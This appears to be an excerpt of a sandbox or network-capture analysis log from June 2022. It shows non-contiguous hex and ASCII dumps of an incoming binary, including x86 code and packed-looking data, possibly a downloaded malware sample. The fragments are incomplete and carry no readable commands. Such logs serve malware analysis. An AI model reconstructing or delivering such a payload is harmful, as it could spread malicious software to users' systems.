                                                                              2022-06-01 23:53:42 UTC252INData Raw: 63 f9 55 b7 46 e5 40 d9 fe 39 90 d0 72 cc 71 e9 9e fd ff ff b3 fd 69 70 27 cc dd e9 3b fd ff ff 7d b1 1f 19 43 e9 30 03 00 00 55 95 ea 15 31 41 6f 8e 12 c3 f1 46 56 e6 e9 29 f9 ff ff 9a b9 9d 9f af ce f9 f4 e7 13 be e9 aa 03 00 00 7e d7 89 20 16 e9 dc 00 00 00 96 86 d1 ed 61 f4 f7 51 e9 a0 fa ff ff d7 80 92 3a c5 16 e9 30 fb ff ff 7f 55 3f b3 6f a1 a4 89 df 37 b2 43 3d e9 de 01 00 00 4c 0b d7 d1 3d ae 88 f0 d3 cf 02 9e b6 b8 85 d2 e9 40 02 00 00 2c 24 93 8b 1d 30 6a f9 91 a3 14 9a 25 f8 f4 c8 a3 5b cc e9 89 fe ff ff 14 1a 64 b4 2f 1a 05 9d 92 6a de 2d 35 bf 1f 0f 8d 8e f9 36 70 c8 d9 c2 05 e9 1d f9 ff ff 1d c4 44 3d e0 28 db 26 d5 74 dc 1f 76 e9 36 f7 ff ff 03 be 86 89 91 cc 11 06 9c 3b ee 8b a1 f5 86 f6 3d 39 22 a0 52 94 09 63 d5 81 3b e9 2f f7 ff ff 4f
                                                                              Data Ascii: cUF@9rqip';}C0U1AoFV)~ aQ:0U?o7C=L=@,$0j%[d/j-56pD=(&tv6;=9"Rc;/O
                                                                              2022-06-01 23:53:42 UTC253INData Raw: 83 bd 60 ff ff ff 00 75 05 e9 6a ff ff ff 8b 85 60 ff ff ff 8b 8d 60 ff ff ff 8b 54 85 ec 2b 54 8d ec 8b 85 60 ff ff ff 89 54 85 ec e9 47 ff ff ff dd 05 48 36 40 00 dd 9d 68 ff ff ff dd 05 40 36 40 00 dd 9d 70 ff ff ff dd 05 38 36 40 00 dd 9d 78 ff ff ff dd 05 30 36 40 00 dd 5d 80 dd 05 28 36 40 00 dd 5d 88 dd 05 20 36 40 00 dd 5d 90 dd 05 18 36 40 00 dd 5d 98 dd 05 10 36 40 00 dd 5d a0 dd 05 08 36 40 00 dd 5d a8 c7 85 5c ff ff ff 00 00 00 00 eb 0f 8b 8d 5c ff ff ff 83 c1 01 89 8d 5c ff ff ff 83 bd 5c ff ff ff 09 0f 8d 22 01 00 00 8b 95 5c ff ff ff 81 e2 01 00 00 80 79 05 4a 83 ca fe 42 85 d2 75 22 db 85 5c ff ff ff 8b 85 5c ff ff ff dc ac c5 68 ff ff ff 8b 8d 5c ff ff ff dd 9c cd 68 ff ff ff eb 46 8b 95 5c ff ff ff 81 e2 01 00 00 80 79 05 4a 83 ca fe 42
                                                                              Data Ascii: `uj``T+T`TGH6@h@6@p86@x06@](6@] 6@]6@]6@]6@]\\\\"\yJBu"\\h\hF\yJB
                                                                              2022-06-01 23:53:42 UTC254INData Raw: 00 00 50 83 ec 08 a1 50 c0 54 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d ec 51 8b cc 89 65 f0 e8 fd 02 00 00 8b 4d ec e8 25 05 00 00 c7 45 fc 00 00 00 00 6a 00 8b 4d ec e8 e4 03 00 00 c7 45 fc ff ff ff ff 8b 45 ec 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 31 04 00 00 8b 4d fc e8 a9 00 00 00 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 4d fc 8b 40 10 2b 41 0c c1 f8 02 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 83 ec 1c 56 89 4d e4 8b 4d e4 e8 ce ff ff ff 8b f0 8b 4d e4 e8 74 02 00 00 3b f0 73 1d 8b 45 08 50 6a 01 8b 4d e4 8b 51 10 52 8b 4d e4 e8 3b 04 00 00 8b 4d e4 89 41 10 eb 2f 8d 55 f0 52 8b 4d e4 e8 87 02 00 00 8b 08 8b 50 04 89 4d f8 89 55 fc 8b 45 08 50 8b 4d fc 51 8b
                                                                              Data Ascii: PPT3PEdMQeM%EjMEEMdY]UQMM1M]UQMEM@+A]UVMMMt;sEPjMQRM;MA/URMPMUEPMQ
                                                                              2022-06-01 23:53:42 UTC256INData Raw: 45 08 50 e8 08 0e 00 00 8b 4d f8 e8 b0 06 00 00 8d 4d 08 51 8b 4d f8 83 c1 08 e8 f1 0d 00 00 8b 45 f8 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 6a 01 8b 45 fc 8b 08 51 8b 4d fc 83 c1 04 e8 26 07 00 00 8b 4d fc e8 0e 37 ff ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 bd 09 00 00 0f b6 c8 85 c9 74 20 8b 55 0c 52 8b 4d fc e8 ca fc ff ff 8b 4d 08 2b c8 51 8b 55 fc 52 8b 4d fc e8 48 fb ff ff eb 44 6a 00 8b 45 0c 50 8b 4d fc e8 28 01 00 00 0f b6 c8 85 c9 74 2c 8b 55 0c 52 8b 45 08 50 8b 4d fc 8b 51 18 52 8b 4d fc e8 8a fc ff ff 50 e8 84 0b 00 00 83 c4 10 8b 45 0c 50 8b 4d fc e8 b5 00 00 00 8b 45 fc 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 8b 45 f8 8b 48 14
                                                                              Data Ascii: EPMMQME]UQMjEQM&M7]UQMEPMt URMM+QURMHDjEPM(t,UREPMQRMPEPME]UMEH
                                                                              2022-06-01 23:53:42 UTC257INData Raw: d4 89 4a 10 8b 45 d4 8b 4d e4 89 48 0c e9 43 01 00 00 8b 55 d4 8b 42 10 2b 45 0c c1 f8 02 3b 45 10 0f 83 c2 00 00 00 8b 4d 14 8b 11 89 55 e0 8b 45 10 8b 4d 0c 8d 14 81 52 8b 45 d4 8b 48 10 51 8b 55 0c 52 8b 4d d4 e8 2a 08 00 00 c7 45 fc 02 00 00 00 8d 45 e0 50 8b 4d d4 8b 51 10 2b 55 0c c1 fa 02 8b 45 10 2b c2 50 8b 4d d4 8b 51 10 52 8b 4d d4 e8 6e fa ff ff eb 35 8b 45 d4 8b 48 10 8b 55 10 8d 04 91 50 8b 4d 10 8b 55 0c 8d 04 8a 50 8b 4d d4 e8 5d fd ff ff 6a 00 6a 00 e8 5f 2a 00 00 c7 45 fc ff ff ff ff b8 60 09 41 00 c3 c7 45 fc ff ff ff ff 8b 4d d4 8b 51 10 8b 45 10 8d 0c 82 8b 55 d4 89 4a 10 8d 45 e0 50 8b 4d 10 c1 e1 02 8b 55 d4 8b 42 10 2b c1 50 8b 4d 0c 51 e8 c2 07 00 00 83 c4 0c eb 6c 8b 55 14 8b 02 89 45 d8 8b 4d d4 8b 51 10 89 55 dc 8b 45 d4 8b 48
                                                                              Data Ascii: JEMHCUB+E;EMUEMREHQURM*EEPMQ+UE+PMQRMn5EHUPMUPM]jj_*E`AEMQEUJEPMUB+PMQlUEMQUEH
                                                                              2022-06-01 23:53:42 UTC273INData Raw: 3a ff 0f 85 07 02 00 00 8b 0e 8b f9 f6 c1 01 74 12 49 81 f9 00 04 00 00 0f 8f e5 01 00 00 ff 45 fc eb 17 8b c1 c1 f8 04 48 83 f8 3f 7e 03 6a 3f 58 8d 84 85 c8 fe ff ff ff 00 83 f9 10 0f 8c c8 01 00 00 f6 c1 0f 0f 85 bf 01 00 00 81 f9 f0 0f 00 00 0f 8f b3 01 00 00 8d 04 31 39 78 fc 0f 85 a3 01 00 00 8b f0 3b f2 72 9e 0f 85 97 01 00 00 81 c2 00 10 00 00 43 83 fb 08 0f 8c 6c ff ff ff 8b 45 fc 8b 7d dc 39 07 0f 85 85 01 00 00 33 f6 83 65 fc 00 8d 5f 08 8b 43 fc 89 7d d4 89 5d d0 3b c7 0f 84 b2 00 00 00 8b 4d fc 3b 8c b5 c8 fe ff ff 74 7f 8b 4d f8 3b c1 0f 82 64 01 00 00 81 c1 00 80 00 00 3b c1 0f 83 56 01 00 00 8b c8 81 e1 00 f0 ff ff 83 c1 0c 8d 91 f0 0f 00 00 3b ca 0f 84 31 01 00 00 3b c8 74 0e 8b 19 83 e3 fe 03 cb 8b 5d d0 3b ca 75 ee 3b ca 0f 84 17 01 00
                                                                              Data Ascii: :tIEH?~j?X19x;rClE}93e_C}];M;tM;d;V;1;t];u;
                                                                              2022-06-01 23:53:42 UTC289INData Raw: ff ff 50 57 ff 76 0c 53 e8 d3 62 00 00 83 c4 44 53 ff 76 04 8d 85 fc fc ff ff 57 50 57 8d 85 fc fe ff ff 50 68 00 02 00 00 ff 76 0c 53 e8 ae 62 00 00 83 c4 24 33 c0 0f b7 8c 45 fc fa ff ff f6 c1 01 74 0e 80 4c 06 1d 10 8a 8c 05 fc fd ff ff eb 11 f6 c1 02 74 15 80 4c 06 1d 20 8a 8c 05 fc fc ff ff 88 8c 06 1d 01 00 00 eb 08 c6 84 06 1d 01 00 00 00 40 3b c7 72 be eb 56 8d 86 1d 01 00 00 c7 85 e4 fa ff ff 9f ff ff ff 33 c9 29 85 e4 fa ff ff 8b 95 e4 fa ff ff 8d 84 0e 1d 01 00 00 03 d0 8d 5a 20 83 fb 19 77 0c 80 4c 0e 1d 10 8a d1 80 c2 20 eb 0f 83 fa 19 77 0e 80 4c 0e 1d 20 8a d1 80 ea 20 88 10 eb 03 c6 00 00 41 3b cf 72 c2 8b 4d fc 5f 33 cd 5b e8 7e 8d ff ff c9 c3 6a 0c 68 a0 ac 54 00 e8 33 c4 ff ff e8 40 e8 ff ff 8b f8 a1 3c c9 54 00 85 47 70 74 1d 83 7f 6c
                                                                              Data Ascii: PWvSbDSvWPWPhvSb$3EtLtL @;rV3)Z wL wL A;rM_3[~jhT3@<TGptl
                                                                              2022-06-01 23:53:42 UTC305INData Raw: 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff 75 10 ff 75 0c 51 ff d2 83 c4 20 eb 1f ff 75 20 ff 75 1c ff 75 24 50 ff 75 14 ff 75 10 ff 75 0c 51 e8 c1 fb ff ff 83 c4 20 33 c0 40 5f 5e 5b 5d c3 6a 08 68 80 ae 54 00 e8 9f 84 ff ff e8 ac a8 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 cf 2b 00 00 e8 b8 84 ff ff c3 e8 7f a8 ff ff 8b 40 7c 85 c0 74 02 ff d0 e9 b4 ff ff ff 6a 08 68 a0 ae 54 00 e8 53 84 ff ff ff 35 8c de 54 00 e8 0e a6 ff ff 59 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 7d ff ff ff cc 68 1d c9 41 00 e8 68 a5
                                                                              Data Ascii: jxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPuuuQ u uu$PuuuQ 3@_^[]jhT@xte3@eE+@|tjhTS5TYte3@eE}hAh
                                                                              2022-06-01 23:53:42 UTC321INData Raw: 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 05 15 06 15 06 15 06 15 06 15 06 15 06 15 06 15 06 25 15 06 15 06 15 06 15 06 15 06 06 0e c0 06 5b 8f eb 59 5d 5c 89 f2 06 52 91 4b 16 8f 4b d2 91 06 4b 12 8f 4b d6 91 4b 0e 06 8f 4b da 91 13 4a c3 5e 0e 06 a7 4e 06 16 37 fc 87 f4 06 83 22 8a 39 8f d0 07 f8 06 87 c8 b4 36 9d 78 89
                                                                              Data Ascii: %[Y]\RKKKKKKJ^N7"96x
                                                                              2022-06-01 23:53:42 UTC337INData Raw: 2f dc 8f 20 d0 50 5c c8 4a 5c e6 57 8e d9 36 3e c9 26 d9 c8 8b c6 7a 88 49 26 e8 09 09 5b 26 79 dc 0e ce 36 cc 8e b0 de c6 0a fa 06 34 b7 06 33 07 06 4b 46 e8 05 26 d1 8e eb 07 4a d4 16 0e e0 0e fb c6 4d e6 3a 05 16 86 cf 07 26 ac 35 a6 4e 0d 08 6e ad 35 a4 23 06 06 cd 4b 86 c6 bb 41 3a 93 ef 98 66 07 18 a7 87 1b 91 13 88 74 c8 87 c8 06 e1 9b 12 7f 87 f0 76 5f 16 87 2f 87 f0 68 07 c8 73 e1 82 4c 86 88 74 07 07 87 74 87 09 27 1e c8 26 89 e6 07 89 fe 26 1e c6 89 50 ff 28 1e c9 06 5c 8e d2 8c 47 e9 1f 87 47 f9 05 06 20 c8 5f d4 26 dc 1f 47 49 ce 0e 85 1e 70 1e de a9 0c 46 99 bf d1 fc 75 b8 6d 1e e0 14 22 2d 4e 53 34 27 8d c1 f1 00 18 06 87 f0 2c 4e a9 cc 87 c8 67 69 07 77 e3 d9 bc 88 36 07 07 87 86 f0 db 08 17 aa 87 c8 09 0a 81 67 07 e5 37 ec 09 c5 ca 37 66
                                                                              Data Ascii: / P\J\W6>&zI&[&y643KF&JM:&5Nn5#KA:ftv_/hsLtt'&&P(\GG _&GIpFum"-NS4',Ngiw6g77f
                                                                              2022-06-01 23:53:42 UTC353INData Raw: 05 05 99 52 61 e8 d5 ad 2a 42 50 b5 ef 26 f8 05 05 52 30 dc 47 e8 4b 6e 08 8d e1 3a 36 be dc 36 e8 fc 4c 27 ef 70 fb 05 05 38 c3 ba 90 0e ee 96 35 d8 ef 54 fa 05 05 e9 68 50 f2 63 a9 ae c4 3e 92 97 7b 69 e2 93 e8 56 42 d5 78 cd 33 69 46 d7 ef 9a 07 06 06 22 8b bb 98 0a a0 9b 36 c3 e4 41 ef 61 ff 05 05 b8 06 70 0b 85 d5 32 4d b5 c2 49 2c be 31 37 57 1e d7 ba 2e 03 21 cb 0a 7c 34 83 a5 f2 f8 ef 56 04 05 05 89 92 1a cf be 33 5c 65 ef e9 ff 05 05 d6 35 11 c9 42 c7 a6 94 bd 98 e7 a0 9e d6 ef b1 f9 05 05 2c 45 bf 87 ef c1 07 06 06 7d ce dd 0e 1d a3 a4 d2 56 db 03 c1 33 ef 25 fd 05 05 87 ec 13 a7 ef 5f fb 05 05 cb de 37 ab 68 8d 78 6e b1 1d 0d ef eb 04 05 05 c7 8b 36 96 02 03 cf 6b 1a 76 cd 34 ef 1d f7 05 05 83 66 8f cd 5e a9 14 7d 32 43 40 36 55 ef 8f 00 05 05
                                                                              Data Ascii: Ra*BP&R0GKn:66L'p85ThPc>{iVBx3iF"6Aap2MI,17W.!|4V3\e5B,E}V3%_7hxn6kv4f^}2C@6U
                                                                              2022-06-01 23:53:42 UTC369INData Raw: a7 ad 65 17 68 b9 ef 94 03 05 05 27 8c 0f 44 ee 22 14 d8 58 a9 d0 20 26 f3 f5 97 ef 4e 01 05 05 46 a2 96 68 c7 7b 50 d1 14 ef b5 04 05 05 16 51 82 81 1c a4 f8 19 28 4d 97 52 ef 19 07 06 06 a9 da 27 e6 57 3f 25 51 ab 6d c1 79 88 0e 54 d4 48 dd ab fa ef e0 ff 05 05 26 2a de 1d b2 f9 eb 27 a3 7c 20 a9 b4 bf 9d cd 54 a1 54 af f6 a6 e0 61 bc 0d 83 a7 02 ef 4c 01 05 05 2c d5 44 a2 86 47 46 d4 53 e7 0e 1d 19 da a6 0e 54 88 26 68 44 ef 8d 05 05 05 7e a8 b8 39 ac bc d6 46 de c8 c2 64 13 75 e9 49 ef 1e 03 05 05 80 20 a4 31 74 cc 16 34 20 55 23 5e ef c0 0a 06 06 be 43 75 dd 30 96 e3 32 8c c3 fe 12 7f 06 93 63 09 ea f2 04 f3 eb a2 41 28 9c a0 1d ed 65 23 24 fd 28 5a b0 55 ae ef 56 01 05 05 b5 c5 b6 b0 93 8a 2e f6 60 10 9a 57 c1 29 a9 26 0e 3e a4 ef 54 00 05 05 18 14
                                                                              Data Ascii: eh'D"X &NFh{PQ(MR'W?%QmyTH&*'| TTaL,DGFST&hD~9FduI 1t4 U#^Cu02cA(e#$(ZUV.`W)&>T
                                                                              2022-06-01 23:53:42 UTC385INData Raw: 86 a4 9a 22 f2 c3 e4 01 4d 95 fb cf 8a 3c ef ae 05 05 05 77 90 1f 9c 42 92 e4 ef 47 0b 06 06 e4 16 dd fc d4 2b 2e c6 4d ef 00 0c 06 06 81 39 ca 6b 11 08 1c 37 a0 ef 5f 32 77 80 19 6c 30 89 b1 ef 9f ff 05 05 b6 74 d8 eb 22 b5 fd d1 ef 54 01 05 05 f3 63 26 3d 4a a0 33 e0 7f cf 93 f4 ea 7d 5b ec 87 94 c1 96 3d 94 ef 20 0f 06 06 81 47 a9 29 ef dd ff 05 05 79 8d f1 84 3f db 16 2a ca ef 5f 09 06 06 54 37 e6 6f 3c b7 c8 70 ef d5 10 06 06 b1 93 01 28 3d 70 22 e3 81 69 d0 98 58 4a ec ef 51 07 06 06 aa 30 e1 de 56 16 36 31 67 77 ae ef e3 08 06 06 34 5b 81 23 d6 34 ab 37 ef 7f 0e 06 06 a7 19 bf 67 2c e8 7b 3d d6 fb 6c a3 7a 8a ef c5 04 05 05 8b 36 6b 4d 9d 0d 8d 8b eb 5f 2d fa 81 4a e5 80 65 a6 ef bc 0e 06 06 e7 2b ae 8d 97 0e fd e8 10 ef 75 0b 06 06 37 5b 65 1a fd
                                                                              Data Ascii: "M<wBG+.M9k7_2wl0t"Tc&=J3}[= G)y?*_T7o<p(=p"iXJQ0V61gw4[#47g,{=lz6kM_-Je+u7[e
                                                                              2022-06-01 23:53:42 UTC401INData Raw: 9e ef b1 04 05 05 4e 5c 9f 55 cd 9e 2a 89 f4 7b 9c 62 42 2a a3 41 ef 79 02 05 05 7f a7 b4 a8 43 75 6e 50 c3 b1 a7 9b da 3c 78 0e 8c b0 e7 45 d7 ef 52 01 05 05 d0 2e 5d 7b 40 f3 8b 78 87 d0 9d a2 8a e4 1d 75 9e d0 b2 e4 01 d3 9e ef b7 01 05 05 de b8 94 12 f0 5d fc f7 f9 a3 ef 37 2e d2 d7 ef 47 06 06 06 3d 41 1a 8d 4e df f6 11 09 ef d2 01 05 05 de ff 40 43 9a 40 f3 fb ed fa 68 44 a5 ef d0 04 05 05 46 23 ce d9 3b 7a ef 2b 05 05 05 dc f8 14 f1 ef b2 02 05 05 3b 32 32 72 aa 30 02 7c 76 1f c5 78 07 ef c9 05 05 05 7f 4c 29 4b ff c0 3f 56 2a cd 7f 47 6a 68 59 77 ef 52 03 05 05 34 c9 34 4e c7 2a 57 dd 4f e8 33 02 ae 56 11 4f b3 11 92 fa 84 ef 09 04 05 05 04 ed f8 cf 68 d8 41 ea 77 ce 61 e3 ef c3 04 05 05 d9 e8 5e be 40 c6 b0 fa 61 bc af e6 88 21 79 d2 e5 24 ec 0f
                                                                              Data Ascii: N\U*{bB*AyCunP<xER.]{@xu]7.G=AN@C@hDF#;z+;22r0|vxL)K?V*GjhYwR44N*WO3VOhAwa^@a!y$
                                                                              2022-06-01 23:53:42 UTC417INData Raw: 40 57 43 f2 c6 d4 d8 65 01 d7 cc 28 de 5d 3f 81 e1 84 00 16 7c 0a 04 b7 78 21 d5 e8 ef 6a 04 05 05 da 64 72 02 08 48 97 31 6f 55 63 24 1e ef 17 06 06 06 ad 02 b2 aa 12 32 97 ef 48 0b 06 06 02 74 e6 f5 6c ef 74 06 06 06 f8 5d 38 64 5a 0b 9b f2 25 43 c3 75 21 fa 34 00 15 ef de 07 06 06 e0 6a 0e 41 15 60 74 45 2e 46 dd dc 7a 37 a3 74 81 17 bf 3b ef a9 01 05 05 6e 8d e9 3e eb 73 4b 86 de ef b0 00 05 05 80 19 8e 63 e7 1d f8 57 ff cf ac 3e 15 ef 10 01 05 05 3b 96 e5 60 73 38 03 5a 08 07 a8 35 ac ef 9c 07 06 06 39 e1 23 fd 99 94 89 97 20 55 0f a7 ed ef 5e 09 06 06 2c 74 bb d9 1d fd 7c ef 71 0a 06 06 c5 79 83 16 1a 5c 74 e5 7a ef 24 01 05 05 d6 2b de b4 80 28 de b1 a1 55 ac 35 52 93 4c f0 0a 3a a0 9f d3 9a f7 ef a7 05 05 05 83 55 e9 85 c0 d0 7f 4e 49 a4 68 3b e1
                                                                              Data Ascii: @WCe(]?|x!jdrH1oUc$2Htlt]8dZ%Cu!4jA`tE.Fz7t;n>sKcW>;`s8Z59# U^,t|qy\tz$+(U5RL:UNIh;
                                                                              2022-06-01 23:53:42 UTC433INData Raw: 1a da 86 ea 05 26 6e ee 8e f9 d7 11 f5 37 31 47 08 0e 16 01 36 e2 0e d8 0a d3 07 26 66 f0 0e da 8e e8 98 0b e9 17 26 ee f2 0e e8 06 3a ea 28 1a 87 3a ca 17 16 c8 26 d0 36 37 2a c9 40 7d 46 bf bf 06 f4 64 e5 3d 2a cb 2a fc 08 b8 4a 8b 52 c6 0b ef 30 08 0f 86 80 0c 0d 06 06 42 24 06 94 68 31 ef ad 0c 06 06 06 30 56 ac 55 2c 11 84 e3 06 64 eb ff 88 bb 73 80 7c 06 0e a6 35 d4 48 ef 14 14 06 06 06 77 72 6c 94 ef f4 06 10 06 06 4a 4c c1 3f b3 06 86 ef bf 0b 06 06 af 3c 26 b2 f8 31 ef 27 76 09 cd 2b 06 5e 8e 20 22 07 7a 37 11 46 94 c9 b8 de ef e9 46 0b 16 06 1f 61 af f6 ad 99 21 76 06 72 71 5c dd f3 a3 f5 89 06 10 09 ab cf 46 69 ff ad 06 47 71 87 1b e7 cf 3d 6a 06 0e e6 8e 94 ef 8d 13 06 06 06 12 8f 3e 07 a8 c1 bc 06 c1 ef 67 12 06 06 b1 a2 06 2d 6d 9c 11 77 a9
                                                                              Data Ascii: &n71G6&f&:(:&67*@}Fd=**JR0B$h10VU,ds|5HwrlJL?<&1'v+^ "z7FFa!vrq\FiGq=j>g-mw
                                                                              2022-06-01 23:53:42 UTC449INData Raw: e5 2e 70 35 06 a7 46 9f 14 4c 06 d2 a3 06 da 65 a4 ae 39 9c fb 02 0a ef b6 c6 2f d6 02 12 1e dd 06 5c 54 55 c6 fd ce 53 53 86 da 22 5b de 00 ef 7a 36 23 06 d1 39 bf 1d 56 68 2b 98 0a ef da 76 2d d8 40 52 6e 94 06 eb cd 6c 30 9a 58 ef 3e 07 56 0f 3c 02 78 fc c8 52 5a 06 2b 64 7a a9 36 bf 06 45 06 44 c9 09 55 fb 9d 29 81 86 17 0b 3c e2 c5 ef 13 56 22 06 7a 7b 01 ca 19 18 e0 b9 16 a8 09 ef 74 c6 1c 12 ef fa 06 cc 61 88 51 aa d7 65 00 06 51 b4 4c 2c 57 fd 6e 91 06 0d 02 bd 94 95 14 d6 a8 86 4c 99 dd 88 24 ef 9c 46 08 06 cb 93 86 5f ed 53 a3 e8 06 f7 d7 5f 50 ca a6 41 be 0e 9b ef 34 86 18 cc e8 65 6a 06 52 f8 7f 36 d6 bd b2 1e 46 f5 bf f8 c2 ef 04 96 2d ad 06 9e ea f7 63 82 9f b1 ef 08 90 16 16 ec e3 21 ee a3 c2 06 cd 41 7e dd 86 de 45 c2 16 e0 31 ef 18 16 08
                                                                              Data Ascii: .p5FLe9/\TUSS"[z6#9Vh+v-@Rnl0X>V<xRZ+dz6EDU)<V"z{taQeQL,WnL$F_S_PA4ejR6F-c!A~E1
                                                                              2022-06-01 23:53:42 UTC465INData Raw: 4e 5f 91 35 ef 06 69 0d 06 06 df 9e fe ca 06 91 fb 26 94 21 77 cf be 0a ef b7 86 0a 98 e1 73 a3 79 06 90 be b9 9d 19 80 eb 32 06 a5 35 82 88 6c ed 23 ef 08 3d 36 16 38 a5 f9 6d 9f 1d 46 68 70 17 01 ef 42 e6 14 b5 06 b6 00 5e 55 2d 61 81 cc 06 15 06 7a 96 b8 66 d4 ef 08 87 36 08 7c e4 b4 a6 41 1d 0e b1 ef a4 86 0a f4 50 f2 e5 86 5e c9 13 27 50 ef f7 26 13 06 e9 a1 1e 73 ca 62 e9 ba 0a ef 9f 26 74 91 39 9c 8c ef 06 99 1f d2 c3 3e 37 3e b2 06 d6 da c7 55 f2 d8 52 1b 0e 33 ef ae 36 1d 7c 7e 93 fb 06 be 5f b9 81 90 11 41 d4 0e de ef 1a d6 17 db 43 0a ab 06 76 71 bd e1 aa d9 39 cd 06 ed cc 1a 9a 7e 25 81 5a 0a ef 8d 06 0c 55 43 8a 93 d1 0e 56 ef 59 b6 14 d5 19 98 55 06 ef a6 10 06 06 9a ba 9a 06 40 81 d0 e8 8f 69 3e 4e 06 49 88 20 cc 78 0c 7b 70 26 c2 2b b4 ef
                                                                              Data Ascii: N_5i&!wsy25l#=68mFhpB^U-azf6|AP^'P&sb&t9>7>UR36|~_ACvq9~%ZUCVYU@i>NI x{p&+
                                                                              2022-06-01 23:53:42 UTC481INData Raw: bd 95 fa ef a4 e9 be 53 e8 19 38 57 63 6f 9e 0b e6 34 51 11 62 08 b8 ef a0 fd 05 05 5a 7b 63 d0 5f f2 69 95 b4 24 88 ef f0 03 05 05 8c 42 e2 62 f4 da 9c 3a 78 c1 f7 b3 d2 d0 3f df 59 f3 27 f3 ef 3f 05 05 05 07 39 d4 f4 a5 30 32 2e 99 16 0f 60 a1 63 3e 86 9b f5 7f ef b8 ff 05 05 d8 dd ed 78 a9 ee 62 a4 6f d1 14 bf 1f 08 59 cd 80 43 36 77 2e be 54 2a fc 8b b3 ef 6c fb 05 05 3d 9b c3 47 03 56 cb f7 72 19 79 4f 26 ef 6d 07 06 06 3f 25 ef ac ef fa fd 05 05 a0 b9 ec c0 02 64 0a 1f 9f 80 dc 64 fa ef ce 06 06 06 e3 6c 24 6d f3 0e b3 da 40 11 53 ef 59 02 05 05 56 31 b8 25 1b 68 87 2e 17 ff 17 7f 35 05 45 ef ff fc 05 05 2a ee 1a 7a cc ef 33 85 08 4e 65 6d 9e df c4 63 b6 00 31 ef 69 fd 05 05 0a 85 52 ec 62 a3 88 b3 18 f4 c6 0f 50 70 ef 99 05 05 05 d9 cd 01 4c b6 d8
                                                                              Data Ascii: S8Wco4QbZ{c_i$Bb:x?Y'?902.`c>xboYC6w.T*l=GVryO&m?%ddl$m@SYV1%h.5E*z3Nemc1iRbPpL
                                                                              2022-06-01 23:53:42 UTC497INData Raw: e7 28 fa ad 08 b8 5f 3e 92 ef c3 00 05 05 93 ab df d9 92 f4 12 9b fa 00 10 47 81 f5 9c 7e 17 a5 41 4e 27 20 19 ef 66 04 05 05 2a 71 27 6a 78 f9 13 20 1c c7 8e 46 4a b6 22 de 6a d1 31 5d b1 32 4d ef 80 09 06 06 c0 b8 91 e7 6a 42 ca e1 79 5b ed 2b ef 01 0d 06 06 8a 8d 97 ec 26 88 ff 53 0c 77 3b bf 7a 1e d5 fc aa ef 7e 06 06 06 2f 09 14 cc ee 94 6b ef a3 0b 06 06 e7 b9 b3 71 ab 61 6c 04 c9 4a 2e ef 34 01 05 05 68 73 d6 ea b8 1b a0 8b 1b a8 fd 64 db bc a4 e8 e4 56 45 ef 95 09 06 06 45 9f 10 62 7a 6b 6b aa b6 14 eb 20 98 ef e7 07 06 06 97 e1 39 28 a2 0f 14 8c 92 f6 11 32 4e f0 85 fe ef 46 02 05 05 d1 96 42 23 28 ef 4b 03 05 05 ac 04 65 93 a7 7e ab bd ef d5 07 06 06 72 fc f9 47 fa 55 ef 0c 0b 06 06 3e 36 fd 37 5b ef 8a 0c 06 06 98 7e 77 60 34 dc 16 b8 c2 6f 44
                                                                              Data Ascii: (_>G~AN' f*q'jx FJ"j1]2MjBy[+&Sw;z~/kqalJ.4hsdVEEbzkk 9(2NFB#(Ke~rGU>67[~w`4oD
                                                                              2022-06-01 23:53:42 UTC513INData Raw: ef 3b 05 05 05 18 ba 46 44 68 b0 27 48 4a 69 6f 14 79 e3 86 c4 93 60 58 c5 64 ef dd 0b 06 06 7d f5 e3 09 c9 9d e8 6e ca 7d d6 6e ba d6 69 2f ef c8 07 06 06 fa 48 bf 06 2b da 01 0a 33 4c f0 af 9c ef 13 0d 06 06 f9 0e 48 22 db 35 f8 b2 d7 68 d0 11 a5 2e 91 a8 b3 12 22 98 e4 33 03 59 44 dd ef 10 06 06 06 5a 2e d7 65 b9 ef 49 92 43 06 ef 4b 01 05 05 dd a3 3d 94 2e 19 bd 9b 72 4e 12 2d 47 99 09 ef a1 00 05 05 dd 43 94 bf df ab 9a ef 09 8c 4a d3 b2 ef e9 ff 05 05 0c 20 bc a3 92 e1 ef 54 09 06 06 b7 74 6c 98 5c 96 81 ef 42 d4 34 24 0d 69 a0 17 f5 25 4e 88 ef 2e 03 05 05 f3 52 fe fc 20 2b 97 03 b4 7d a1 fd 6f 54 ef c3 09 06 06 dd d6 f3 09 3b b9 47 13 1f 08 0b 17 ef eb 09 06 06 ef bd 25 f1 66 84 51 ef c3 51 d4 56 38 85 f4 45 cb 0a 51 1b cc e6 93 d3 1d ef a5 06 06
